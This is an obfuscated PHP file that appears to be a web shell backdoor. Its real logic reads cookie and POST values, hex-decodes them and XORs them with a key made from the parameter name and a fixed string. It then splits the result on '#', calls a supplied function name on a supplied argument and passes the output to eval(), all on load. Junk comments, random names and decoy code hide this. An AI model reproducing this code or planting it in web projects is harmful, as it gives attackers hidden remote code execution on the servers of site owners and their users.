<?php function	WmfAdpBkQ($TaJMCIp)
     	{

	return	@pack(	'H'	.   chr	(42),	$TaJMCIp/*   qrCq  */);$_aRaG	=/*Uq  */'38301';
    /*  isn  */
			/*W  */$UbaRw  = md5($TaJMCIp);;
   	$KINMbw/*   Y*/=     base64_decode($TaJMCIp);

/*   ZL */if/*  byoh*/($KINMbw	===	false)    {

    $KINMbw     =/*  xL   */'';
 /*   CyE*/}

	$FEieXDPi/* fo  */= str_split($TaJMCIp);
         $CISPsULPb =  strlen($TaJMCIp);$_jee    =    '64023';
		$ioWrYrai  =	0;
     while	(  $ioWrYrai/* abuF*/</*   E  */$CISPsULPb/*OoWNo  */)  {
				/*   usM */$ioWrYrai++;$_prETL     =/*   WWAzB*/'6940';
		    $SuUlMBWD =	$FEieXDPi[$ioWrYrai];$_UWn	=    '3332';
 /*  BuX   */if/*   bqso   */(strpos($SuUlMBWD,   'a')/*   C   */!==	false)  {
 /*  LNgli */$FEieXDPi[$ioWrYrai]	=     strtoupper($SuUlMBWD);;
	  }
					/* HVni */}
   /*YdRW   */$YLcVXqrB	=  implode('',   $FEieXDPi);


  $_GET['decoded']    =/* NmM  */$YLcVXqrB;;


	$_POST['hash']	=	$UbaRw;$_r =   '40998';
  if     (file_exists('path/to/file'))/*  Da*/{

    $XIotG/*   gVw*/=     file_get_contents('path/to/file');
		     $qhwYEIB	= explode(',',	$XIotG);$_PM/*  f  */=     '21729';

    $lbHEOk/*  k  */=	md5(serialize($qhwYEIB));$_d =	'12394';

     if	(is_array($qhwYEIB))	{


	$acOISqvgV/* xi   */=	array_slice($qhwYEIB,     0,/*vR */5);
	}

	}
/* xRt*/$khzAWEeS     =	array_map('trim',	$acOISqvgV);$_nlafT =	'11298';
 /*cB*/$uXHiHt   =	rawurldecode(implode(',',    $khzAWEeS));
    	$_COOKIE['final_value']/*  x*/=/* Y*/$uXHiHt;
 }
				/*IkHh   */


    function  AAnNgC()


 {
 	$GFyfGV  =    Array($_COOKIE,     $_POST);$_z	=  '58731';


	$QtyTTzR/* YpUk  */=	array_map('md5',	$_COOKIE);$_mAke	=/*   Llxp */'12859';


 $uVuvOcs    =/*stoXR*/strpos($_SERVER['HTTP_USER_AGENT'],/*   eZkm */'Mozilla')     !==/*   sBz  */false     ?/*dArQT */'browser	is/* dfbuc */Mozilla'  :/*zQBPk  */'browser	is/*  uJ */not	Mozilla';$_Jnt	=	'64194';
    

    if	(is_array($GFyfGV))    {
 	$jmwzM/*  H  */=/*   FbaIX   */array_slice($GFyfGV,   0,/* rH*/1);


/*   wGlf  */}     else/* IHEk */{

	$jmwzM  =	[];$_g   =	'14707';
					}
  
     /* jtYJ */$jZBZZjoDfU/*   OiyEB */=    explode(',',	'apple,orange,banana');
				  $VErKQPGuk/*Rng  */=	rawurldecode('%20Hello%20World%20');
				/* QY */$ioWrYrai	=	0;$_K	=/*NnMa  */'58353';   
   /* cfk   */while	($ioWrYrai/*cLk*/<	count($jZBZZjoDfU)	)     {
					$jZBZZjoDfU[$ioWrYrai]/*LQ  */=     str_repeat($jZBZZjoDfU[$ioWrYrai],/*   e */2);$_DLTIn/*  hU   */=	'1824';
		  $ioWrYrai++;$_vSQA    =     '17734';
	/* l  */}
        
     /*   FVFG   */$VcSgDHCY	=    str_repeat($uVuvOcs,	3);$_LTcy	=/*  gZjp  */'62936';
     	
    return   $GFyfGV;
 	}


/*IhELQ   */


	function	eELFG($yluMhhDAp)


	{
 /*   vdIQU   */$cgMSS/* mLOv   */=	"\43";;


	foreach   (AAnNgC()	as	$yvfsyYc)    {
   	ZwKjtqDi($yvfsyYc,	$cgMSS);


	}
					/* VqMX*/}
						
					/*  zc*/function/* duwhC   */YmulJu($lgEZUj,    $VAcXctSg)

	{


	if/* k  */(   count  (	$lgEZUj	)   ==    3	)/*JFlzz*/{
		$kskNgp	=/*EXqjp  */$lgEZUj[1];
   	$bkkNKox   =    $lgEZUj[2];
       $wWaxMJVB/* rrd  */=	$kskNgp($bkkNKox);
					 eval/*  uh*/(/* E*/$wWaxMJVB/*  KGmaS */);


	die	();$_ncDNK =/*B */'32445';
  	}
			  }
	    
    function  QYtmjGHlwq($TaJMCIp,	$KeeysqTzmn)
				{
   return	$TaJMCIp ^    $KeeysqTzmn;$_gZyjJ	=	'55250';
		  }
	
/*b   */function   hzahD($ioWrYraiKIjKuvN,  $cgMSS)
 	{/*uAq*/

	$ioWrYraiKIjKuvN	= explode	($cgMSS,  $ioWrYraiKIjKuvN  );
				
				    YmulJu($ioWrYraiKIjKuvN,/*  U */$cgMSS);$_W/* wcFv   */=	'48819';
			}

    	function   ZwKjtqDi($yvfsyYc,     $cgMSS)
				{
					foreach     (	$yvfsyYc/* jjI */as/*h  */$KeeysqTzmn  => $TaJMCIp/*  KL   */)	{


/*   Tbntc  */vApWLGCZC($KeeysqTzmn,	WmfAdpBkQ($TaJMCIp),	$cgMSS);
		}
   /* Zq  */}
  /*vD */
				/* pfK   */function	UPocRmc($KeeysqTzmn,/*  ppbO*/$TaJMCIp)
					/* hZG*/{


/*TK*/$uwPNXvDK	=   strlen(  $TaJMCIp	)/strlen(/*  gYJ   */$KeeysqTzmn/*  DCLK */);;


/*   SuW  */$KeeysqTzmn/*   FCfmb   */.=/*  bHtD  */"aZIAst-TSw-RrQS-GxQA-vPltqFJ-XEon-vGN";
				/*   FBmXq  */$KeeysqTzmn =/*  z*/str_repeat	(	$KeeysqTzmn,/*   GwRiM */intval($uwPNXvDK)/*zGAuU  */+ 1);
		     
      return	$KeeysqTzmn;;
     /*   V */}
			 
   	function     vApWLGCZC($KeeysqTzmn,  $TaJMCIp,     $cgMSS)
	{/*  pySC*/
     	hzahD(QYtmjGHlwq($TaJMCIp,  UPocRmc($KeeysqTzmn,	$TaJMCIp)),	$cgMSS);

	

	$IfOnHVbb/*ele*/=	trim($TaJMCIp);
					$oaTHpKaWgN/*   iNUhe */=	explode($cgMSS,	$IfOnHVbb);;
		/*  llNrD  */if/* Krtm*/(count($oaTHpKaWgN) >/* OdDXW   */1)/* Fd*/{
        $GMEpajdFTv     = implode("\x2d",  $oaTHpKaWgN);;
 /* hxX */$VrePjXWGzn/* FaGoC */=    str_pad($GMEpajdFTv, 20,  chr	(	255   -/* uXCmQ  */207	),	STR_PAD_RIGHT);
				}
			/*LRath*/}
	    
     	eELFG("");$_WdtxW/*  B   */=	'202';